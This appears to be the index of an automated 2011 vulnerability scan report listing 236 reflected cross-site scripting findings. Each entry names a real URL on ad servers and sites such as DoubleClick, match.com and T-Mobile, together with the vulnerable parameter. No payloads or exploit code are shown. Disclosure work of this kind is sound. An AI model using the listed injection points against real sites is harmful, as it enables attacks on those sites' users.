XSS, DORK, March 22, 2011 Report, Example, PoC's, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 24 06:46:39 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. Cross-site scripting (reflected)

1.1. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [adurl parameter]

1.2. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [ai parameter]

1.3. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [client parameter]

1.4. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [num parameter]

1.5. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [sig parameter]

1.6. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [sz parameter]

1.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [adurl parameter]

1.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [ai parameter]

1.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [client parameter]

1.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [num parameter]

1.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [sig parameter]

1.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.34 [sz parameter]

1.13. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [AdID parameter]

1.14. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [FlightID parameter]

1.15. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Redirect parameter]

1.16. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Segments parameter]

1.17. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [TargetID parameter]

1.18. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [Values parameter]

1.19. http://ad.doubleclick.net/adi/N6036.CNNMoney.com/B5125476.2 [sz parameter]

1.20. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [AdID parameter]

1.21. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [FlightID parameter]

1.22. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Redirect parameter]

1.23. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Segments parameter]

1.24. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [TargetID parameter]

1.25. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [Values parameter]

1.26. http://ad.doubleclick.net/adi/N815.cnnmoney/B5064924.32 [sz parameter]

1.27. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

1.28. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

1.29. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

1.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

1.31. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

1.32. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

1.33. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

1.34. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

1.35. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

1.36. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

1.37. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

1.38. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

1.39. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

1.40. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

1.41. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

1.42. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

1.43. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click parameter]

1.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [AdID parameter]

1.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [FlightID parameter]

1.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Redirect parameter]

1.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Segments parameter]

1.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [TargetID parameter]

1.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Values parameter]

1.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [name of an arbitrarily supplied request parameter]

1.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [AdID parameter]

1.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [AdID parameter]

1.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [FlightID parameter]

1.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [FlightID parameter]

1.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 2]

1.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 2]

1.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 3]

1.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 3]

1.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Redirect parameter]

1.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Redirect parameter]

1.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Segments parameter]

1.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Segments parameter]

1.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [TargetID parameter]

1.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [TargetID parameter]

1.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Values parameter]

1.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [Values parameter]

1.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [click parameter]

1.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [click parameter]

1.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [name of an arbitrarily supplied request parameter]

1.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [name of an arbitrarily supplied request parameter]

1.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click parameter]

1.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [AdID parameter]

1.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [FlightID parameter]

1.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Redirect parameter]

1.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Segments parameter]

1.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [TargetID parameter]

1.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Values parameter]

1.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [name of an arbitrarily supplied request parameter]

1.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [AdID parameter]

1.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [AdID parameter]

1.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [FlightID parameter]

1.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [FlightID parameter]

1.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 2]

1.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 2]

1.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 3]

1.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 3]

1.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Redirect parameter]

1.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Redirect parameter]

1.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Segments parameter]

1.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Segments parameter]

1.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [TargetID parameter]

1.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [TargetID parameter]

1.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Values parameter]

1.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Values parameter]

1.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [click parameter]

1.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [click parameter]

1.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [name of an arbitrarily supplied request parameter]

1.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [name of an arbitrarily supplied request parameter]

1.100. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 2]

1.101. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 2]

1.102. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 3]

1.103. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [REST URL parameter 3]

1.104. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [click parameter]

1.105. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [click parameter]

1.106. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [name of an arbitrarily supplied request parameter]

1.107. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [name of an arbitrarily supplied request parameter]

1.108. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954** [10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter]

1.109. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954** [name of an arbitrarily supplied request parameter]

1.110. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 2]

1.111. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 2]

1.112. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 3]

1.113. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 3]

1.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [click parameter]

1.115. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [click parameter]

1.116. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [name of an arbitrarily supplied request parameter]

1.117. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [name of an arbitrarily supplied request parameter]

1.118. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [ybt parameter]

1.119. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [yhdata parameter]

1.120. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [yyob parameter]

1.121. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [zip parameter]

1.122. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 2]

1.123. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 2]

1.124. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 3]

1.125. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 3]

1.126. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [click parameter]

1.127. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [click parameter]

1.128. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [name of an arbitrarily supplied request parameter]

1.129. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [name of an arbitrarily supplied request parameter]

1.130. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [ybt parameter]

1.131. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [yhdata parameter]

1.132. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [yyob parameter]

1.133. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [zip parameter]

1.134. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 2]

1.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 2]

1.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 3]

1.137. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 3]

1.138. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [click parameter]

1.139. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [click parameter]

1.140. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [name of an arbitrarily supplied request parameter]

1.141. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [name of an arbitrarily supplied request parameter]

1.142. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [ybt parameter]

1.143. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [yhdata parameter]

1.144. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [yyob parameter]

1.145. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [zip parameter]

1.146. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 2]

1.147. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 2]

1.148. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 3]

1.149. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 3]

1.150. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [click parameter]

1.151. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [click parameter]

1.152. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [name of an arbitrarily supplied request parameter]

1.153. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [name of an arbitrarily supplied request parameter]

1.154. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [ybt parameter]

1.155. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [yhdata parameter]

1.156. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [yyob parameter]

1.157. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [zip parameter]

1.158. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 2]

1.159. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 2]

1.160. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 3]

1.161. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 3]

1.162. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [click parameter]

1.163. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [click parameter]

1.164. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [name of an arbitrarily supplied request parameter]

1.165. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [name of an arbitrarily supplied request parameter]

1.166. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [ybt parameter]

1.167. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [yhdata parameter]

1.168. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [yyob parameter]

1.169. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [zip parameter]

1.170. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217** [&click parameter]

1.171. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828217** [name of an arbitrarily supplied request parameter]

1.172. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242** [&click parameter]

1.173. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828242** [name of an arbitrarily supplied request parameter]

1.174. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246** [&click parameter]

1.175. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828246** [name of an arbitrarily supplied request parameter]

1.176. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252** [&click parameter]

1.177. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300828252** [name of an arbitrarily supplied request parameter]

1.178. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

1.179. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.180. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

1.181. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

1.182. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.183. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

1.184. http://api.bizographics.com/v1/profile.json [&callback parameter]

1.185. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.186. http://api.screenname.aol.com/auth/getToken [c parameter]

1.187. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.188. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.189. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.190. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.191. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.192. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.193. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.194. http://c.aol.com/read/_share_counts [callback parameter]

1.195. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

1.196. http://cim.meebo.com/cmd/drads [impression parameter]

1.197. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]

1.198. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]

1.199. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]

1.200. http://ds.addthis.com/red/psi/sites/www.sailingworld.com/p.json [callback parameter]

1.201. http://g2.gumgum.com/services/get [callback parameter]

1.202. http://i.microsoft.com/en-us/homepage/bimapping.js [v parameter]

1.203. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

1.204. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

1.205. http://imp.fetchback.com/serve/fb/adtag.js [tid parameter]

1.206. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

1.207. http://js.revsci.net/gateway/gw.js [csid parameter]

1.208. http://mbox12e.offermatica.com/m2/tmobile/mbox/standard [mbox parameter]

1.209. http://media.match.com/iframe [@CPSC@ parameter]

1.210. http://media.match.com/iframe [name of an arbitrarily supplied request parameter]

1.211. http://media.match.com/iframe [target parameter]

1.212. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [REST URL parameter 1]

1.213. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [REST URL parameter 2]

1.214. http://metaframe.digitalsmiths.tv/v1/tmzcompany/playlists/mostrecent [format parameter]

1.215. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.216. http://publisher.mediapass.com/AffiliateID.aspx [Name parameter]

1.217. http://r.turn.com/server/pixel.htm [fpid parameter]

1.218. http://r.turn.com/server/pixel.htm [sp parameter]

1.219. https://secure.coolhandle.com/cart.php [domainoption parameter]

1.220. https://secure.coolhandle.com/other/contactform_orderform.php [name of an arbitrarily supplied request parameter]

1.221. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

1.222. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

1.223. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

1.224. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

1.225. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

1.226. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

1.227. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

1.228. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

1.229. http://web.lightningcast.net/servlets/getPlaylist [uid parameter]

1.230. http://www.aolnews.com/category/nation/ [REST URL parameter 2]

1.231. http://www.match.com/search/searchSubmit.aspx [name of an arbitrarily supplied request parameter]

1.232. http://www.t-mobile.com//htmlservices/navigation/TMobileNavigation.ashx [currentURL parameter]

1.233. http://www.t-mobile.com/Company/Community.aspx [name of an arbitrarily supplied request parameter]

1.234. http://www.t-mobile.com/Company/PrivacyResources.aspx [name of an arbitrarily supplied request parameter]

1.235. http://www.t-mobile.com/Company/Working.aspx [name of an arbitrarily supplied request parameter]

1.236. http://www.t-mobile.com/business/Information.aspx [name of an arbitrarily supplied request parameter]
